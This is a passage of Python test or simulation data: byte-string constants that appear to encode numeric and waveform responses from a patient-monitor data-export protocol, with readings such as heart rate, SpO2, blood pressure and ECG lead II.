b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_7_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_7_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_7_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x40\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x02\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x44\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xdd\x20\xa5\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\xb1\x21\xd1" \ b"\x09\x6e\x01\x06\x01\x02\x04\x00\x01\x00\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xfc\x1f\xfa\x1f\xf9" \ b"\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6" \ b"\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf9" \ b"\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb" \ b"\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xf3\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9" \ b"\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb" \ b"\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1" \ b"\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe9" \ b"\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed\x1f\xed\x1f\xef\x1f\xef\x1f\xf1" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9" \ b"\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff\x1f\xfd\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_7_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x48\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_7_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x50\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ 